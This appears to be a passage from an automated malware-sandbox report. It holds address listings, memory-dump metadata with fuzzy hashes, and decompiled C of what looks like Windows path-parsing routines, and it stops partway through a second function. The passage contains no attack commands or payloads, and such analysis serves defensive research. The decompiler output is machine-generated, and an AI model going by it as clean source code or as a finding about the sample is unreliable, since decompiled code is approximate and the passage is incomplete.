                                                                              0x01836059
                                                                              0x0183605c
                                                                              0x01836061
                                                                              0x01836061
                                                                              0x01836022
                                                                              0x01836022
                                                                              0x01836022
                                                                              0x01836025
                                                                              0x0183602a
                                                                              0x0183602b
                                                                              0x01836031
                                                                              0x01836037
                                                                              0x01836038
                                                                              0x0183603e
                                                                              0x01836048
                                                                              0x01836049
                                                                              0x0183604a
                                                                              0x0183604b
                                                                              0x0183604c
                                                                              0x0183604d
                                                                              0x01836053
                                                                              0x01836054
                                                                              0x01836054
                                                                              0x01836062
                                                                              0x01836065
                                                                              0x01836067
                                                                              0x0183606a
                                                                              0x01836070
                                                                              0x01836075
                                                                              0x01836076
                                                                              0x01836081
                                                                              0x01836087
                                                                              0x01836095
                                                                              0x01836099
                                                                              0x0183609e
                                                                              0x018360a4
                                                                              0x018360ae
                                                                              0x018360b0
                                                                              0x018360b3
                                                                              0x018360b6
                                                                              0x018360b8
                                                                              0x018360ba
                                                                              0x018360ba
                                                                              0x018360ba
                                                                              0x018360ba
                                                                              0x018360be
                                                                              0x018360c0
                                                                              0x018360c5
                                                                              0x018360c5
                                                                              0x018360c5
                                                                              0x018360c6
                                                                              0x018360cd
                                                                              0x01836114
                                                                              0x018360cf
                                                                              0x018360cf
                                                                              0x018360d4
                                                                              0x018360d5
                                                                              0x018360da
                                                                              0x018360db
                                                                              0x018360e1
                                                                              0x018360e2
                                                                              0x018360e8
                                                                              0x018360f8
                                                                              0x018360fd
                                                                              0x018360fe
                                                                              0x01836102
                                                                              0x01836104
                                                                              0x01836107
                                                                              0x01836109
                                                                              0x0183610b
                                                                              0x0183610b
                                                                              0x0183610b
                                                                              0x0183610b
                                                                              0x0183610f
                                                                              0x0183610f
                                                                              0x01836117
                                                                              0x0183611a
                                                                              0x0183611f
                                                                              0x01836125
                                                                              0x01836134
                                                                              0x01836139
                                                                              0x0183613f
                                                                              0x01836146
                                                                              0x01836148
                                                                              0x0183614b
                                                                              0x0183614d
                                                                              0x0183614f
                                                                              0x0183614f
                                                                              0x0183614f
                                                                              0x0183614f
                                                                              0x01836153
                                                                              0x01836159
                                                                              0x01836159
                                                                              0x0183615c
                                                                              0x01836163
                                                                              0x01836169
                                                                              0x0183616c
                                                                              0x01836172
                                                                              0x01836181
                                                                              0x01836186
                                                                              0x01836187
                                                                              0x0183618b
                                                                              0x01836191
                                                                              0x01836195
                                                                              0x018361a3
                                                                              0x018361bb
                                                                              0x018361c0
                                                                              0x018361c3
                                                                              0x018361cc
                                                                              0x018361d0
                                                                              0x018361dc
                                                                              0x018361de
                                                                              0x018361e1
                                                                              0x018361e4
                                                                              0x018361e6
                                                                              0x018361e8
                                                                              0x018361e8
                                                                              0x018361e8
                                                                              0x018361e8
                                                                              0x018361e6
                                                                              0x018361ec
                                                                              0x018361f3
                                                                              0x01836203
                                                                              0x01836209
                                                                              0x0183620a
                                                                              0x01836216
                                                                              0x0183621d
                                                                              0x01836227
                                                                              0x01836241
                                                                              0x01836246
                                                                              0x0183624c
                                                                              0x01836257
                                                                              0x01836259
                                                                              0x0183625c
                                                                              0x0183625e
                                                                              0x01836260
                                                                              0x01836260
                                                                              0x01836260
                                                                              0x01836260
                                                                              0x0183625e
                                                                              0x01836264
                                                                              0x01836267
                                                                              0x01836269
                                                                              0x01836315
                                                                              0x01836315
                                                                              0x0183631b
                                                                              0x0183631e
                                                                              0x01836324
                                                                              0x01836327
                                                                              0x0183632f
                                                                              0x01836330
                                                                              0x01836333
                                                                              0x0183633a
                                                                              0x0183633c
                                                                              0x01836335
                                                                              0x01836335
                                                                              0x01836335
                                                                              0x0183633f
                                                                              0x01836342
                                                                              0x0183634c
                                                                              0x01836352
                                                                              0x01836355
                                                                              0x01836355
                                                                              0x01836359
                                                                              0x00000000
                                                                              0x0183626f
                                                                              0x01836275
                                                                              0x01836275
                                                                              0x01836278
                                                                              0x0183627e
                                                                              0x0183627e
                                                                              0x01836281
                                                                              0x01836287
                                                                              0x0183628d
                                                                              0x01836298
                                                                              0x0183629c
                                                                              0x018362a2
                                                                              0x0183629e
                                                                              0x0183629e
                                                                              0x0183629e
                                                                              0x018362a7
                                                                              0x018362a7
                                                                              0x018362aa
                                                                              0x018362b0
                                                                              0x018362f0
                                                                              0x018362f0
                                                                              0x018362f2
                                                                              0x018362f8
                                                                              0x018362fd
                                                                              0x018362b2
                                                                              0x018362b2
                                                                              0x018362b2
                                                                              0x018362b5
                                                                              0x018362dd
                                                                              0x018362e2
                                                                              0x018362e5
                                                                              0x018362b7
                                                                              0x018362b8
                                                                              0x018362bb
                                                                              0x018362bd
                                                                              0x018362c0
                                                                              0x018362c4
                                                                              0x018362cd
                                                                              0x018362cd
                                                                              0x018362c0
                                                                              0x018362bb
                                                                              0x018362b5
                                                                              0x01836302
                                                                              0x01836303
                                                                              0x01836305
                                                                              0x01836305
                                                                              0x01836305
                                                                              0x0183630c
                                                                              0x0183630c
                                                                              0x00000000
                                                                              0x0183627e
                                                                              0x01836269
                                                                              0x01835eac
                                                                              0x01835ebb
                                                                              0x01835ebe
                                                                              0x01835ecb
                                                                              0x01835ecb
                                                                              0x01835ece
                                                                              0x01835ece
                                                                              0x01835ed4
                                                                              0x01835ed7
                                                                              0x01835ed9
                                                                              0x01835edb
                                                                              0x01835edb
                                                                              0x01835ee1
                                                                              0x01835ee1
                                                                              0x01835ee3
                                                                              0x01835f20
                                                                              0x01835f20
                                                                              0x01835ee5
                                                                              0x01835ee5
                                                                              0x01835ee5
                                                                              0x01835ee8
                                                                              0x01835f11
                                                                              0x01835f18
                                                                              0x01835eea
                                                                              0x01835eea
                                                                              0x01835eed
                                                                              0x01835ef2
                                                                              0x01835ef8
                                                                              0x01835efb
                                                                              0x01835f0a
                                                                              0x01835f0a
                                                                              0x01835eed
                                                                              0x01835ee8
                                                                              0x01835f22
                                                                              0x01835f28
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835f30
                                                                              0x01835f31
                                                                              0x01835f37
                                                                              0x01835f3a
                                                                              0x01835f3d
                                                                              0x01835f44
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835f46
                                                                              0x01835f48
                                                                              0x01835f4d
                                                                              0x00000000
                                                                              0x01835f4d
                                                                              0x01835dda
                                                                              0x01835ddf
                                                                              0x00000000
                                                                              0x01835ddf
                                                                              0x01835dd8
                                                                              0x01835da7
                                                                              0x01835da9
                                                                              0x01835dac
                                                                              0x01835dae
                                                                              0x00000000
                                                                              0x01835db4
                                                                              0x01835db4
                                                                              0x00000000
                                                                              0x01835db4
                                                                              0x01835dae
                                                                              0x01835d88
                                                                              0x01835d8d
                                                                              0x01836363
                                                                              0x01836369
                                                                              0x0183636a
                                                                              0x01836370
                                                                              0x01836372
                                                                              0x0183637a
                                                                              0x0183637b
                                                                              0x0183637d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0183637f
                                                                              0x01836385
                                                                              0x00000000
                                                                              0x01836385
                                                                              0x01835d38
                                                                              0x01835d3b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835d3b
                                                                              0x01835d27
                                                                              0x01835d29
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01836360
                                                                              0x00000000
                                                                              0x01836360
                                                                              0x01835c10
                                                                              0x01835c10
                                                                              0x018363da
                                                                              0x018363e5
                                                                              0x018363e5

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7d1d346e5a6863641e63b6d4503c58449543d80eb9eb78e52bc45ead7ee38a46
                                                                              • Instruction ID: fec2841dd038cbf39b0e4cc3cde0b36cd33e3eabe1d12866325c847fae0b61ac
                                                                              • Opcode Fuzzy Hash: 7d1d346e5a6863641e63b6d4503c58449543d80eb9eb78e52bc45ead7ee38a46
                                                                              • Instruction Fuzzy Hash: 4F422075D00219DFDB24CF68C880BA9BBB1FF85304F1981A9D94DEB242E7749A85CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01784120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E01784120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x185d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0179F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01786E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01784620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01786E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017845F8))) {
												case 0:
													_v568 = 0x1741078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01784620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E017AF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E017AF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017652A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0177EB70(1, 0x18579a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0177AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017A95D0();
																			L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E017AB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017A3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E017AB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                              0x01784128
                                                                              0x01784135
                                                                              0x0178413c
                                                                              0x01784141
                                                                              0x01784145
                                                                              0x01784147
                                                                              0x0178414e
                                                                              0x01784151
                                                                              0x01784159
                                                                              0x0178415c
                                                                              0x01784160
                                                                              0x01784164
                                                                              0x01784168
                                                                              0x0178416c
                                                                              0x0178417f
                                                                              0x01784181
                                                                              0x0178446a
                                                                              0x0178446a
                                                                              0x0178418c
                                                                              0x01784195
                                                                              0x01784199
                                                                              0x01784432
                                                                              0x01784439
                                                                              0x0178443d
                                                                              0x01784442
                                                                              0x01784447
                                                                              0x00000000
                                                                              0x0178419f
                                                                              0x017841a3
                                                                              0x017841b1
                                                                              0x017841b9
                                                                              0x017841bd
                                                                              0x017845db
                                                                              0x017845db
                                                                              0x00000000
                                                                              0x017841c3
                                                                              0x017841c3
                                                                              0x017841ce
                                                                              0x017841d4
                                                                              0x017ce138
                                                                              0x017ce13e
                                                                              0x017ce169
                                                                              0x017ce16d
                                                                              0x017ce19e
                                                                              0x017ce16f
                                                                              0x017ce16f
                                                                              0x017ce175
                                                                              0x017ce179
                                                                              0x017ce18f
                                                                              0x017ce193
                                                                              0x00000000
                                                                              0x017ce199
                                                                              0x00000000
                                                                              0x017ce199
                                                                              0x017ce193
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017841da
                                                                              0x017841da
                                                                              0x017841df
                                                                              0x017841e4
                                                                              0x017841ec
                                                                              0x01784203
                                                                              0x01784207
                                                                              0x017ce1fd
                                                                              0x01784222
                                                                              0x01784226
                                                                              0x017ce1f3
                                                                              0x017ce1f3
                                                                              0x0178422c
                                                                              0x0178422c
                                                                              0x01784233
                                                                              0x017ce1ed
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01784239
                                                                              0x01784239
                                                                              0x01784239
                                                                              0x01784239
                                                                              0x01784233
                                                                              0x01784226
                                                                              0x017841ee
                                                                              0x017841ee
                                                                              0x017841f4
                                                                              0x01784575
                                                                              0x017ce1b1
                                                                              0x017ce1b1
                                                                              0x00000000
                                                                              0x0178457b
                                                                              0x0178457b
                                                                              0x01784582
                                                                              0x017ce1ab
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01784588
                                                                              0x01784588
                                                                              0x0178458c
                                                                              0x017ce1c4
                                                                              0x017ce1c4
                                                                              0x00000000
                                                                              0x01784592
                                                                              0x01784592
                                                                              0x01784599
                                                                              0x017ce1be
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178459f
                                                                              0x0178459f
                                                                              0x017845a3
                                                                              0x017ce1d7
                                                                              0x017ce1e4
                                                                              0x00000000
                                                                              0x017845a9
                                                                              0x017845a9
                                                                              0x017845b0
                                                                              0x017ce1d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017845b6
                                                                              0x017845b6
                                                                              0x017845b6
                                                                              0x00000000
                                                                              0x017845b6
                                                                              0x017845b0
                                                                              0x017845a3
                                                                              0x01784599
                                                                              0x0178458c
                                                                              0x01784582
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017841f4
                                                                              0x0178423e
                                                                              0x01784241
                                                                              0x017845c0
                                                                              0x017845c4
                                                                              0x00000000
                                                                              0x017845ca
                                                                              0x017845ca
                                                                              0x00000000
                                                                              0x017ce207
                                                                              0x017ce20f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017845d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017845ca
                                                                              0x00000000
                                                                              0x01784247
                                                                              0x01784247
                                                                              0x01784247
                                                                              0x01784249
                                                                              0x01784249
                                                                              0x01784249
                                                                              0x01784251
                                                                              0x01784251
                                                                              0x01784257
                                                                              0x0178425f
                                                                              0x0178426e
                                                                              0x01784270
                                                                              0x0178427a
                                                                              0x017ce219
                                                                              0x017ce219
                                                                              0x01784280
                                                                              0x01784282
                                                                              0x01784456
                                                                              0x017845ea
                                                                              0x00000000
                                                                              0x017845f0
                                                                              0x017ce223
                                                                              0x00000000
                                                                              0x017ce223
                                                                              0x0178445c
                                                                              0x0178445c
                                                                              0x00000000
                                                                              0x0178445c
                                                                              0x00000000
                                                                              0x01784288
                                                                              0x0178428c
                                                                              0x017ce298
                                                                              0x01784292
                                                                              0x01784292
                                                                              0x0178429e
                                                                              0x017842a3
                                                                              0x017842a7
                                                                              0x017842ac
                                                                              0x017ce22d
                                                                              0x017842b2
                                                                              0x017842b2
                                                                              0x017842b9
                                                                              0x017842bc
                                                                              0x017842c2
                                                                              0x017842ca
                                                                              0x017842cd
                                                                              0x017842cd
                                                                              0x017842d4
                                                                              0x0178433f
                                                                              0x0178433f
                                                                              0x017842d6
                                                                              0x017842d6
                                                                              0x017842d9
                                                                              0x017842dd
                                                                              0x017842eb
                                                                              0x017ce23a
                                                                              0x017842f1
                                                                              0x01784305
                                                                              0x0178430d
                                                                              0x01784315
                                                                              0x01784318
                                                                              0x0178431f
                                                                              0x01784322
                                                                              0x0178432e
                                                                              0x0178433b
                                                                              0x0178433b
                                                                              0x00000000
                                                                              0x0178432e
                                                                              0x017842eb
                                                                              0x0178434c
                                                                              0x0178434e
                                                                              0x01784352
                                                                              0x01784359
                                                                              0x0178435e
                                                                              0x01784361
                                                                              0x0178436e
                                                                              0x0178438a
                                                                              0x0178438e
                                                                              0x01784396
                                                                              0x0178439e
                                                                              0x017843a1
                                                                              0x017843ad
                                                                              0x017843bb
                                                                              0x017843bb
                                                                              0x017843ad
                                                                              0x0178436e
                                                                              0x017843bf
                                                                              0x017843c5
                                                                              0x01784463
                                                                              0x01784463
                                                                              0x017843ce
                                                                              0x017843d5
                                                                              0x017843d9
                                                                              0x017843df
                                                                              0x01784475
                                                                              0x01784479
                                                                              0x01784491
                                                                              0x01784491
                                                                              0x01784479
                                                                              0x017843e5
                                                                              0x017843eb
                                                                              0x017843f4
                                                                              0x017843f6
                                                                              0x017843f9
                                                                              0x017843fc
                                                                              0x017843ff
                                                                              0x017844e8
                                                                              0x017844ed
                                                                              0x017844f3
                                                                              0x017ce247
                                                                              0x00000000
                                                                              0x017844f9
                                                                              0x01784504
                                                                              0x01784508
                                                                              0x0178450f
                                                                              0x017ce269
                                                                              0x00000000
                                                                              0x01784515
                                                                              0x01784519
                                                                              0x01784531
                                                                              0x01784534
                                                                              0x01784537
                                                                              0x0178453e
                                                                              0x01784541
                                                                              0x0178454a
                                                                              0x017ce255
                                                                              0x017ce255
                                                                              0x017ce25b
                                                                              0x017ce25e
                                                                              0x017ce261
                                                                              0x017ce261
                                                                              0x01784555
                                                                              0x01784559
                                                                              0x0178455d
                                                                              0x017ce26d
                                                                              0x017ce270
                                                                              0x017ce274
                                                                              0x017ce27a
                                                                              0x017ce27d
                                                                              0x017ce28e
                                                                              0x017ce28e
                                                                              0x01784563
                                                                              0x01784563
                                                                              0x01784569
                                                                              0x01784569
                                                                              0x00000000
                                                                              0x0178455d
                                                                              0x0178450f
                                                                              0x00000000
                                                                              0x017844f3
                                                                              0x017843ff
                                                                              0x01784405
                                                                              0x01784405
                                                                              0x01784405
                                                                              0x017842ac
                                                                              0x0178428c
                                                                              0x01784282
                                                                              0x01784407
                                                                              0x0178440d
                                                                              0x017ce2af
                                                                              0x017ce2af
                                                                              0x01784413
                                                                              0x01784413
                                                                              0x00000000
                                                                              0x017841d4
                                                                              0x00000000
                                                                              0x017841c3
                                                                              0x017841bd
                                                                              0x01784415
                                                                              0x01784415
                                                                              0x01784416
                                                                              0x01784417
                                                                              0x01784429
                                                                              0x0178416e
                                                                              0x0178416e
                                                                              0x01784175
                                                                              0x01784498
                                                                              0x0178449f
                                                                              0x017ce12d
                                                                              0x00000000
                                                                              0x017ce133
                                                                              0x00000000
                                                                              0x017ce133
                                                                              0x017844a5
                                                                              0x017844a5
                                                                              0x017844aa
                                                                              0x00000000
                                                                              0x017844bb
                                                                              0x017844ca
                                                                              0x017844d6
                                                                              0x017844d7
                                                                              0x017844d8
                                                                              0x017844e3
                                                                              0x017844e3
                                                                              0x017844aa
                                                                              0x0178417b
                                                                              0x0178417b
                                                                              0x0178417b
                                                                              0x00000000
                                                                              0x0178417b
                                                                              0x01784175
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d45911fda3581be045de489a38769a56b79655574462151619c8cf44f4811036
                                                                              • Instruction ID: 8635e1376940e102de6721d15514f569ac7761ee67c3cfab093c9ed3d1e466b7
                                                                              • Opcode Fuzzy Hash: d45911fda3581be045de489a38769a56b79655574462151619c8cf44f4811036
                                                                              • Instruction Fuzzy Hash: 30F17B706482128BC724EF18C484B3AFBE1FF98714F14496EF98ACB291E774D991CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017920A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E017920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
